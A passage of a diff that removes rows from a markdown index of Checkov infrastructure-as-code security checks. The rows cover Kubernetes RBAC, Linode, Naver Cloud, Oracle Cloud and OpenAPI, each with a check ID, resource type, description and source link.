-| 3469 | CKV_K8S_157              | resource                         | Role                                                                                             | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings                                                                                                       | Kubernetes              | [RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py)                                                                              |
-| 3470 | CKV_K8S_158              | resource                         | ClusterRole                                                                                      | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles                                                                                                                 | Kubernetes              | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py)                                                                                    |
-| 3471 | CKV_K8S_158              | resource                         | Role                                                                                             | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles                                                                                                                 | Kubernetes              | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py)                                                                                    |
-| 3472 | CKV2_K8S_1               | resource                         | ClusterRole                                                                                      | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding                                                                                                       | Kubernetes              | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml)                                                                                        |
-| 3473 | CKV2_K8S_1               | resource                         | ClusterRoleBinding                                                                               | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding                                                                                                       | Kubernetes              | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml)                                                                                        |
-| 3474 | CKV2_K8S_1               | resource                         | Role                                                                                             | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding                                                                                                       | Kubernetes              | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml)                                                                                        |
-| 3475 | CKV2_K8S_1               | resource                         | RoleBinding                                                                                      | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding                                                                                                       | Kubernetes              | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml)                                                                                        |
-| 3476 | CKV2_K8S_2               | resource                         | ClusterRole                                                                                      | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation                                                                                        | Kubernetes              | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml)                                                          |
-| 3477 | CKV2_K8S_2               | resource                         | ClusterRoleBinding                                                                               | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation                                                                                        | Kubernetes              | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml)                                                          |
-| 3478 | CKV2_K8S_2               | resource                         | Role                                                                                             | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation                                                                                        | Kubernetes              | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml)                                                          |
-| 3479 | CKV2_K8S_2               | resource                         | RoleBinding                                                                                      | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation                                                                                        | Kubernetes              | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml)                                                          |
-| 3480 | CKV2_K8S_3               | resource                         | ClusterRole                                                                                      | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts                                                                                                           | Kubernetes              | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml)                                                                      |
-| 3481 | CKV2_K8S_3               | resource                         | ClusterRoleBinding                                                                               | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts                                                                                                           | Kubernetes              | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml)                                                                      |
-| 3482 | CKV2_K8S_3               | resource                         | Role                                                                                             | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts                                                                                                           | Kubernetes              | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml)                                                                      |
-| 3483 | CKV2_K8S_3               | resource                         | RoleBinding                                                                                      | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts                                                                                                           | Kubernetes              | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml)                                                                      |
-| 3484 | CKV2_K8S_4               | resource                         | ClusterRole                                                                                      | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster.           | Kubernetes              | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml)                                                                          |
-| 3485 | CKV2_K8S_4               | resource                         | ClusterRoleBinding                                                                               | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster.           | Kubernetes              | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml)                                                                          |
-| 3486 | CKV2_K8S_4               | resource                         | Role                                                                                             | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster.           | Kubernetes              | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml)                                                                          |
-| 3487 | CKV2_K8S_4               | resource                         | RoleBinding                                                                                      | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster.           | Kubernetes              | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml)                                                                          |
-| 3488 | CKV2_K8S_5               | resource                         | ClusterRole                                                                                      | No ServiceAccount/Node should be able to read all secrets                                                                                                                                                | Kubernetes              | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml)                                                                                      |
-| 3489 | CKV2_K8S_5               | resource                         | ClusterRoleBinding                                                                               | No ServiceAccount/Node should be able to read all secrets                                                                                                                                                | Kubernetes              | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml)                                                                                      |
-| 3490 | CKV2_K8S_5               | resource                         | Role                                                                                             | No ServiceAccount/Node should be able to read all secrets                                                                                                                                                | Kubernetes              | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml)                                                                                      |
-| 3491 | CKV2_K8S_5               | resource                         | RoleBinding                                                                                      | No ServiceAccount/Node should be able to read all secrets                                                                                                                                                | Kubernetes              | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml)                                                                                      |
-| 3492 | CKV2_K8S_6               | resource                         | Deployment                                                                                       | Minimize the admission of pods which lack an associated NetworkPolicy                                                                                                                                    | Kubernetes              | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml)                                                |
-| 3493 | CKV2_K8S_6               | resource                         | Pod                                                                                              | Minimize the admission of pods which lack an associated NetworkPolicy                                                                                                                                    | Kubernetes              | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml)                                                |
-| 3494 | CKV_LIN_1                | provider                         | linode                                                                                           | Ensure no hard coded Linode tokens exist in provider                                                                                                                                                     | Terraform               | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py)                                                                                              |
-| 3495 | CKV_LIN_2                | resource                         | linode_instance                                                                                  | Ensure SSH key set in authorized_keys                                                                                                                                                                    | Terraform               | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py)                                                                                      |
-| 3496 | CKV_LIN_3                | resource                         | linode_user                                                                                      | Ensure email is set                                                                                                                                                                                      | Terraform               | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py)                                                                                        |
-| 3497 | CKV_LIN_4                | resource                         | linode_user                                                                                      | Ensure username is set                                                                                                                                                                                   | Terraform               | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py)                                                                                  |
-| 3498 | CKV_LIN_5                | resource                         | linode_firewall                                                                                  | Ensure Inbound Firewall Policy is not set to ACCEPT                                                                                                                                                      | Terraform               | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py)                                                                      |
-| 3499 | CKV_LIN_6                | resource                         | linode_firewall                                                                                  | Ensure Outbound Firewall Policy is not set to ACCEPT                                                                                                                                                     | Terraform               | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py)                                                                    |
-| 3500 | CKV_NCP_1                | resource                         | ncloud_lb_target_group                                                                           | Ensure HTTP HTTPS Target group defines Healthcheck                                                                                                                                                       | Terraform               | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py)                                                         |
-| 3501 | CKV_NCP_2                | resource                         | ncloud_access_control_group                                                                      | Ensure every access control groups rule has a description                                                                                                                                                | Terraform               | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py)                                                     |
-| 3502 | CKV_NCP_2                | resource                         | ncloud_access_control_group_rule                                                                 | Ensure every access control groups rule has a description                                                                                                                                                | Terraform               | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py)                                                     |
-| 3503 | CKV_NCP_3                | resource                         | ncloud_access_control_group_rule                                                                 | Ensure no security group rules allow outbound traffic to 0.0.0.0/0                                                                                                                                       | Terraform               | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py)                                                           |
-| 3504 | CKV_NCP_4                | resource                         | ncloud_access_control_group_rule                                                                 | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22                                                                                                                                  | Terraform               | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py)                                                 |
-| 3505 | CKV_NCP_5                | resource                         | ncloud_access_control_group_rule                                                                 | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389                                                                                                                                | Terraform               | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py)                                             |
-| 3506 | CKV_NCP_6                | resource                         | ncloud_server                                                                                    | Ensure Server instance is encrypted.                                                                                                                                                                     | Terraform               | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py)                                                                                 |
-| 3507 | CKV_NCP_7                | resource                         | ncloud_launch_configuration                                                                      | Ensure Basic Block storage is encrypted.                                                                                                                                                                 | Terraform               | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py)                                                       |
-| 3508 | CKV_NCP_8                | resource                         | ncloud_network_acl_rule                                                                          | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20                                                                                                                                                   | Terraform               | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py)                                                                                             |
-| 3509 | CKV_NCP_9                | resource                         | ncloud_network_acl_rule                                                                          | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21                                                                                                                                                   | Terraform               | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py)                                                                                             |
-| 3510 | CKV_NCP_10               | resource                         | ncloud_network_acl_rule                                                                          | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22                                                                                                                                                   | Terraform               | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py)                                                                                             |
-| 3511 | CKV_NCP_11               | resource                         | ncloud_network_acl_rule                                                                          | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389                                                                                                                                                 | Terraform               | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py)                                                                                         |
-| 3512 | CKV_NCP_12               | resource                         | ncloud_network_acl_rule                                                                          | An inbound Network ACL rule should not allow ALL ports.                                                                                                                                                  | Terraform               | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py)                                                                                             |
-| 3513 | CKV_NCP_13               | resource                         | ncloud_lb_listener                                                                               | Ensure LB Listener uses only secure protocols                                                                                                                                                            | Terraform               | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py)                                                             |
-| 3514 | CKV_NCP_14               | resource                         | ncloud_nas_volume                                                                                | Ensure NAS is securely encrypted                                                                                                                                                                         | Terraform               | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py)                                                                               |
-| 3515 | CKV_NCP_15               | resource                         | ncloud_lb_target_group                                                                           | Ensure Load Balancer Target Group is not using HTTP                                                                                                                                                      | Terraform               | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py)                                                                         |
-| 3516 | CKV_NCP_16               | resource                         | ncloud_lb                                                                                        | Ensure Load Balancer isn't exposed to the internet                                                                                                                                                       | Terraform               | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py)                                                                                       |
-| 3517 | CKV_NCP_18               | resource                         | ncloud_auto_scaling_group                                                                        | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks.                                                                                        | Terraform               | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml)                                                                       |
-| 3518 | CKV_NCP_18               | resource                         | ncloud_lb_target_group                                                                           | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks.                                                                                        | Terraform               | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml)                                                                       |
-| 3519 | CKV_NCP_19               | resource                         | ncloud_nks_cluster                                                                               | Ensure Naver Kubernetes Service public endpoint disabled                                                                                                                                                 | Terraform               | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py)                                                                                         |
-| 3520 | CKV_NCP_20               | resource                         | ncloud_route                                                                                     | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity                                                                                    | Terraform               | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py)                                                                 |
-| 3521 | CKV_NCP_22               | resource                         | ncloud_nks_cluster                                                                               | Ensure NKS control plane logging enabled for all log types                                                                                                                                               | Terraform               | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py)                                                                           |
-| 3522 | CKV_NCP_22               | resource                         | ncloud_route_table                                                                               | Ensure a route table for the public subnets is created.                                                                                                                                                  | Terraform               | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml)                                               |
-| 3523 | CKV_NCP_22               | resource                         | ncloud_subnet                                                                                    | Ensure a route table for the public subnets is created.                                                                                                                                                  | Terraform               | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml)                                               |
-| 3524 | CKV_NCP_23               | resource                         | ncloud_public_ip                                                                                 | Ensure Server instance should not have public IP.                                                                                                                                                        | Terraform               | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py)                                                                                           |
-| 3525 | CKV_NCP_24               | resource                         | ncloud_lb_listener                                                                               | Ensure Load Balancer Listener Using HTTPS                                                                                                                                                                | Terraform               | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py)                                                                               |
-| 3526 | CKV_NCP_25               | resource                         | ncloud_access_control_group_rule                                                                 | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80                                                                                                                                  | Terraform               | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py)                                                 |
-| 3527 | CKV_NCP_26               | resource                         | ncloud_access_control_group                                                                      | Ensure Access Control Group has Access Control Group Rule attached                                                                                                                                       | Terraform               | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml)                                                       |
-| 3528 | CKV_OCI_1                | provider                         | oci                                                                                              | Ensure no hard coded OCI private key in provider                                                                                                                                                         | Terraform               | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py)                                                                                                 |
-| 3529 | CKV_OCI_2                | resource                         | oci_core_volume                                                                                  | Ensure OCI Block Storage Block Volume has backup enabled                                                                                                                                                 | Terraform               | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py)                                                                     |
-| 3530 | CKV_OCI_3                | resource                         | oci_core_volume                                                                                  | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK)                                                                                                                      | Terraform               | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py)                                                                           |
-| 3531 | CKV_OCI_4                | resource                         | oci_core_instance                                                                                | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled                                                                                                                           | Terraform               | [InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py)                                             |
-| 3532 | CKV_OCI_5                | resource                         | oci_core_instance                                                                                | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled                                                                                                                                | Terraform               | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py)                                                           |
-| 3533 | CKV_OCI_6                | resource                         | oci_core_instance                                                                                | Ensure OCI Compute Instance has monitoring enabled                                                                                                                                                       | Terraform               | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py)                                                                     |
-| 3534 | CKV_OCI_7                | resource                         | oci_objectstorage_bucket                                                                         | Ensure OCI Object Storage bucket can emit object events                                                                                                                                                  | Terraform               | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py)                                                                         |
-| 3535 | CKV_OCI_8                | resource                         | oci_objectstorage_bucket                                                                         | Ensure OCI Object Storage has versioning enabled                                                                                                                                                         | Terraform               | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py)                                                                         |
-| 3536 | CKV_OCI_9                | resource                         | oci_objectstorage_bucket                                                                         | Ensure OCI Object Storage is encrypted with Customer Managed Key                                                                                                                                         | Terraform               | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py)                                                                         |
-| 3537 | CKV_OCI_10               | resource                         | oci_objectstorage_bucket                                                                         | Ensure OCI Object Storage is not Public                                                                                                                                                                  | Terraform               | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py)                                                                                 |
-| 3538 | CKV_OCI_11               | resource                         | oci_identity_authentication_policy                                                               | OCI IAM password policy - must contain lower case                                                                                                                                                        | Terraform               | [IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py)                                                                   |
-| 3539 | CKV_OCI_12               | resource                         | oci_identity_authentication_policy                                                               | OCI IAM password policy - must contain Numeric characters                                                                                                                                                | Terraform               | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py)                                                                       |
-| 3540 | CKV_OCI_13               | resource                         | oci_identity_authentication_policy                                                               | OCI IAM password policy - must contain Special characters                                                                                                                                                | Terraform               | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py)                                                   |
-| 3541 | CKV_OCI_14               | resource                         | oci_identity_authentication_policy                                                               | OCI IAM password policy - must contain Uppercase characters                                                                                                                                              | Terraform               | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py)                                                                   |
-| 3542 | CKV_OCI_15               | resource                         | oci_file_storage_file_system                                                                     | Ensure OCI File System is Encrypted with a customer Managed Key                                                                                                                                          | Terraform               | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py)                                                                               |
-| 3543 | CKV_OCI_16               | resource                         | oci_core_security_list                                                                           | Ensure VCN has an inbound security list                                                                                                                                                                  | Terraform               | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py)                                                                                 |
-| 3544 | CKV_OCI_17               | resource                         | oci_core_security_list                                                                           | Ensure VCN inbound security lists are stateless                                                                                                                                                          | Terraform               | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py)                                                               |
-| 3545 | CKV_OCI_18               | resource                         | oci_identity_authentication_policy                                                               | OCI IAM password policy for local (non-federated) users has a minimum length of 14 characters                                                                                                            | Terraform               | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py)                                                                                     |
-| 3546 | CKV_OCI_19               | resource                         | oci_core_security_list                                                                           | Ensure no security list allow ingress from 0.0.0.0:0 to port 22.                                                                                                                                         | Terraform               | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py)                                                     |
-| 3547 | CKV_OCI_20               | resource                         | oci_core_security_list                                                                           | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389.                                                                                                                                       | Terraform               | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py)                                                 |
-| 3548 | CKV_OCI_21               | resource                         | oci_core_network_security_group_security_rule                                                    | Ensure security group has stateless ingress security rules                                                                                                                                               | Terraform               | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py)                                 |
-| 3549 | CKV_OCI_22               | resource                         | oci_core_network_security_group_security_rule                                                    | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22                                                                                                                                  | Terraform               | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py)                                                 |
-| 3550 | CKV2_OCI_1               | resource                         | oci_identity_group                                                                               | Ensure administrator users are not associated with API keys                                                                                                                                              | Terraform               | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml)                               |
-| 3551 | CKV2_OCI_1               | resource                         | oci_identity_user                                                                                | Ensure administrator users are not associated with API keys                                                                                                                                              | Terraform               | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml)                               |
-| 3552 | CKV2_OCI_1               | resource                         | oci_identity_user_group_membership                                                               | Ensure administrator users are not associated with API keys                                                                                                                                              | Terraform               | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml)                               |
-| 3553 | CKV2_OCI_2               | resource                         | oci_core_network_security_group_security_rule                                                    | Ensure NSG does not allow all traffic on RDP port (3389)                                                                                                                                                 | Terraform               | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml)                                                                           |
-| 3554 | CKV2_OCI_3               | resource                         | oci_containerengine_cluster                                                                      | Ensure Kubernetes engine cluster is configured with NSG(s)                                                                                                                                               | Terraform               | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml)               |
-| 3555 | CKV2_OCI_4               | resource                         | oci_file_storage_export                                                                          | Ensure File Storage File System access is restricted to root users                                                                                                                                       | Terraform               | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml)                                           |
-| 3556 | CKV2_OCI_5               | resource                         | oci_containerengine_node_pool                                                                    | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption                                                                                                               | Terraform               | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml)         |
-| 3557 | CKV2_OCI_6               | resource                         | oci_containerengine_cluster                                                                      | Ensure Kubernetes Engine Cluster pod security policy is enforced                                                                                                                                         | Terraform               | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml)                                 |
-| 3558 | CKV_OPENAPI_1            | resource                         | securityDefinitions                                                                              | Ensure that securityDefinitions is defined and not empty - version 2.0 files                                                                                                                             | OpenAPI                 | [SecurityDefinitions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitions.py)                                                                                    |
-| 3559 | CKV_OPENAPI_2            | resource                         | security                                                                                         | Ensure that if the security scheme is not of type 'oauth2', the array value must be empty - version 2.0 files                                                                                            | OpenAPI                 | [Oauth2SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityRequirement.py)                                                                        |
